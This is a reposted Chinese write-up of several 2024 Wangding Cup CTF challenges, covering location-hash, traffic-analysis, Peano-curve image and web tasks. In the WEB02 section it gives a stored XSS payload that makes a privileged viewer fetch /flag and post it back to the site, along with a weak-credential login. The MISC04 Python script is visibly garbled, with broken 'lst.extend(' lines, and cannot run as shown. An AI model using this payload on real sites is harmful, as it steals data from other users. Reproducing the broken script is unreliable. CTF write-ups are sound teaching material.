2024网鼎杯青龙组Web+Misc部分WP
MISC01发现人员的定位信息存在泄漏,请对其进行分析。flag为用户位置信息进行32位md5哈希值
我们在这里可以找到关于Location——information信息
https://i-blog.csdnimg.cn/direct/14fdf1f3cf974dda976eaf20ba4816af.png
实验把val值继续32位md5哈希加密,拿到flag
flag{4c4e66ea9aa659b1cac5d4fe327bbfc1}
MISC03
第 1 步:看到好几个上传木马的 ip,都试一试,最终 ip 为 39.168.5.60 的为
精确攻击 ip
https://i-blog.csdnimg.cn/direct/2d22ed5e5fac4a1b93b8c34c066d4094.png
MISC04
推测应该是按着曲线的轨迹将像素还原到原来的位置
https://i-blog.csdnimg.cn/direct/78ebdc578c894d3fa04643ee5a23b379.png
脚本如下:
from PIL import Image
from tqdm import tqdm
def peano(n):
if n == 0:
return []
else:
in_lst = peano(n - 1)
lst = in_lst.copy()
px,py = lst[-1]
lst.extend(, py + 1 + i] for i in in_lst)
px,py = lst[-1]
lst.extend(, py + 1 + i] for i in in_lst)
px,py = lst[-1]
lst.extend(, py - i] for i in in_lst)
px,py = lst[-1]
lst.extend(, py - 1 - i] for i in in_lst)
px,py = lst[-1]
lst.extend(, py - 1 - i] for i in in_lst)
px,py = lst[-1]
lst.extend(, py + i] for i in in_lst)
px,py = lst[-1]
lst.extend(, py + 1 + i] for i in in_lst)
px,py = lst[-1]
lst.extend(, py + 1 + i] for i in in_lst)
return lst
order = peano(6)
img = Image.open(r"C:\Users\ASUSROG\Desktop\chal.png")
width, height = img.size
block_width = width # // 3
block_height = height # // 3
new_image = Image.new("RGB", (width, height))
for i, (x, y) in tqdm(enumerate(order)):
# 根据列表顺序获取新的坐标
new_x, new_y = i % width, i // width
# 获取原图像素
pixel = img.getpixel((x, height - 1 - y))
# 在新图像中放置像素
new_image.putpixel((new_x, new_y), pixel)
new_image.save("rearranged_image.jpg") 拿到二维码,扫描拿到flag
https://i-blog.csdnimg.cn/direct/2682be40638a4983bdf52ae8b37ee44e.png
参考:IrisCTF2024 | 1r0ny
WEB02(环境关了没图片呜呜呜)
第 1 步:打开网页,目录扫描扫描到/flag,实验访问,提示只有 boos 可以访
问。
第 2 步:实验登录,admin/1,登录成功。
第 3 步:
<script>fetch('/flag').then(response=>response.text()).then(data=>{fetch('/content/a9571d0
e889a28847d8682903',{method:'POST',headers:{'Content-Type':'application/x-www-form-
urlencoded'},body:"content="+data});})</script> 更新之后提交给 boos,革新页面拿到 flag
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]